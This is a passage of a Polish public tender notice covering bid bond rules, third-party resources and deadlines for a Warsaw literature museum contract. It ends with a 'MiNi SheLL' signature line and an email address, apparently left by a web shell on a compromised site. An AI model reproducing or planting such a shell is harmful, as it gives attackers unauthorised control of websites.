co najmniej jedną Grupą interwencyjną (GI) wg wzoru stanowiącego Załącznik Nr 10 do<br/>SWZ.<br/>5) Oświadczenie dot. sytuacji ekonomicznej lub finansowej pozwalającej mu na opłacenie i zawarcie ubezpieczenia<br/>odpowiedzialności cywilnej w zakresie prowadzonego postępowania związanej z przedmiotem zamówienia na kwotę nie mniejszą<br/>niż 1.000.000,00 zł (słownie: jeden milion złotych).<br/>6) Oświadczenie na potwierdzenie spełniania warunków</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Zamawiający wymaga wniesienia wadium przed upływem terminu składania ofert, określonego<br/>w niniejszej SWZ. Wysokość wadium wynosi: 15 000 PLN (słownie: piętnaście tysięcy złotych).<br/>2. Wadium musi obejmować pełen okres związania ofertą.<br/>3. Wadium może być wniesione wg wyboru Wykonawcy w jednej lub kilku formach wskazanych w art. 97 ust. 7 ustawy Pzp<br/>tj.:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2023 r., poz. 462).<br/>4. Wadium wnoszone w pieniądzu wpłaca się wyłącznie przelewem na rachunek bankowy Muzeum Literatury im. Adama<br/>Mickiewicza, Rynek Starego Miasta 20, 00-272 Warszawa: Bank Pekao S.A., ul. Żubra 1, 01-066 Warszawa, Numer konta:<br/>47 1240 1138 1111 0011 2983 8129, w takim terminie, aby najpóźniej przed upływem terminu składania ofert, środki<br/>finansowe z tytułu wadium znajdowały się na wskazanym wyżej rachunku Zamawiającego.<br/>5. Za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania na rachunku bankowym Zamawiającego.<br/>6. W przypadku wniesienia wadium w pieniądzu w formularzu ofertowym należy wpisać numer konta i adres na który należy<br/>dokonać zwrotu wadium – druk oświadczenia znajduje się w formularzu ofertowym, będącym Załącznikiem Nr 2 do SWZ.<br/>7. Wnoszone wadium musi być oznaczone dopiskiem: „Wadium / Ochrona dla Muzeum Literatury”.<br/>8. Jeżeli wadium wnoszone jest w formie gwarancji lub poręczenia, Wykonawca przekazuje Zamawiającemu otrzymany od<br/>wystawcy dokumentu: oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>9. Wadium wnoszone w poręczeniach lub gwarancjach powinno zawierać następujące elementy:<br/>1) nazwę dającego zlecenie (Wykonawca/-cy), beneficjenta gwarancji (Zamawiającego), gwaranta/poręczyciela oraz<br/>wskazanie ich siedzib. Beneficjentem wskazanym w gwarancji lub poręczeniu musi być Muzeum Literatury im. Adama<br/>Mickiewicza, Rynek Starego Miasta 20, 00-272 Warszawa,<br/>2) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>3) kwotę gwarancji/poręczenia,<br/>4) termin ważności gwarancji/poręczenia,<br/>5) zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na pierwsze pisemne żądanie<br/>Zamawiającego (beneficjenta gwarancji), w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp.<br/>10. Jeżeli dokument potwierdzający wniesienie wadium będzie sporządzony w innym języku niż język polski, Wykonawca<br/>złoży tłumaczenie, sporządzone przez tłumacza tego dokumentu na język polski, w postaci poświadczonego za zgodność<br/>cyfrowego odwzorowania z dokumentem w postaci oryginalnej.<br/>11. Z dokumentu wadium wniesionego w formach określonych w ust. 3 pkt 2-4 powyżej, powinno wynikać jednoznacznie<br/>gwarantowanie wypłat należności w sposób nieodwołalny, bezwarunkowy i na pierwsze żądanie Zamawiającego. Wadium<br/>takie powinno obejmować cały okres związania ofertą, poczynając od daty składania ofert.<br/>12. W przypadku, gdy Wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium<br/>nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98<br/>ust. 2 pkt 3 ustawy Pzp, Zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>13. Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1-5 ustawy Pzp.<br/>14. Zamawiający, na podstawie art. 98 ust. 6 ustawy, zatrzymuje wadium wraz z odsetkami, a w przypadku wadium<br/>wniesionego w formie gwarancji lub poręczenia, o których mowa w ust. 3 pkt 2-4 powyżej, występuje odpowiednio do<br/>gwaranta lub poręczyciela z żądaniem zapłaty wadium.<br/>15. Przedłużenie terminu związania ofertą jest dopuszczalne tylko z jednoczesnym przedłużeniem okresu ważności wadium<br/>albo, jeżeli nie jest to możliwe, z wniesieniem nowego wadium na przedłużony okres związania ofertą. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Potencjał podmiotu trzeciego - wzór oświadczenia stanowi Załącznik Nr 6 do SWZ.<br/>2. Wykonawca może w celu potwierdzenia spełnienia warunków udziału w postę¬powaniu polegać na zdolnościach<br/>technicznych lub zawodowych innych podmiotów,<br/>z zastrzeżeniem kluczowych części przedmiotu zamówienia, o których mowa<br/>w ROZDZIALE V SWZ (tzn. że w niniejszym postępowaniu Wykonawca może polegać na zdolnościach technicznych lub<br/>zawodowych innych podmiotów tylko w zakresie dysponowania Grupami Interwencyjnymi (GI) lub sytuacji finansowej lub<br/>ekonomicznej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych.<br/>3. W odniesieniu do warunków dotyczących zdolności technicznych lub zawodowych Wykonawcy mogą polegać na<br/>zdolnościach podmiotów udostępniających zasoby (dotyczy Grupy Interwencyjnej (GI), jeśli podmioty te wykonają usługi, do<br/>realizacji których te zdolności są wymagane (będą Podwykonawcami).<br/>4. Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby, składa, wraz z ofertą,<br/>zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji<br/>danego zamówienia potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych<br/>podmiotów oraz oświadczenie podmiotów udostępniających zasoby o ich niepodleganiu wykluczeniu z postępowania – wzór<br/>stanowi Załącznik Nr 6 do SWZ.<br/>5. Jeżeli Wykonawca polega na zasobach innych podmiotów, Zamawiający wy¬maga od Wykonawcy przedstawienia na<br/>wezwanie, w odniesieniu do tych podmiotów dokumentów, o których mowa w ROZDZIALE XIII Część II ust. 2 pkt 1) i/lub pkt<br/>2) oraz ust. 5 (jeżeli będzie dotyczyć).<br/>6. Podmiot, który zobowiązał się do udostępnienia zasobów, odpowiada solidarnie z Wykonawcą, który polega na jego<br/>sytuacji finansowej lub ekonomicznej, za szkodę poniesioną przez Zamawiającego powstałą wskutek nieudostępnienia tych<br/>zasobów, chyba że za nieudostępnienie zasobów podmiot ten nie ponosi winy<br/>7. Jeżeli zdolności techniczne lub zawodowe, sytuacja ekonomiczna lub finansowa podmiotu udostępniającego zasoby nie<br/>potwierdzają spełniania przez Wykonawcę warunków udziału<br/>w postępowaniu lub zachodzą wobec tego podmiotu podstawy wykluczenia, Zamawiający żąda, aby Wykonawca w terminie<br/>określonym przez Zamawiającego zastąpił ten podmiot innym podmiotem lub podmiotami albo wykazał, że samodzielnie<br/>spełnia warunki udziału w postępowaniu.<br/>8. Zamawiający oceni, czy udostępniane Wykonawcy przez inne podmioty zdolności techniczne lub zawodowe lub ich<br/>sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w<br/>postępowaniu oraz zbada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, o których mowa w art. 108 ust. 1<br/>oraz art. 109 ust. 1 pkt 4, 5, 7 ustawy Pzp. oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach<br/>w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.<br/>9. Wykonawca nie może, po upływie terminu składania ofert, powoływać się na zdolności lub sytuację podmiotów<br/>udostępniających zasoby, jeżeli na etapie składania ofert nie polegał on w danym zakresie na zdolnościach lub sytuacji<br/>podmiotów udostępniających zasoby.<br/>10. Sposób spełniania warunków udziału w postępowaniu przez Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia został opisany w rozdziale XIII Cz. II SWZ oraz rozdziale XIV <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzenia zostały wskazane w Załączniku nr 1 do SWZ projekcie<br/>umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-03 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma e-zamowienia: https://ezamowienia.gov.pl (zakładka &#34;Oferty/wnioski&#34;); 2 ) Zamawiający nie posługuje się, tj. nie korzysta i nie udostępnia w przedmiotowym postępowaniu interaktywnego formularza ofertowego opracowanego przez Platformę e-zamowienia; 3) Ofertę należy złożyć na formularzu oferty stanowiącym Załącznik nr 2 do SWZ.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-03 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-01-02</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Po upływie: odpowiednio 5 dni od dnia przesłania zawiadomienia o wyborze najkorzystniejszej oferty lub krótszym (jeżeli w<br/>postępowaniu złożonym tylko jedną ofertę) - Wykonawca w terminie trzech dni przedłoży Zamawiającemu dokumenty<br/>wymienione w rozdziale XX SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com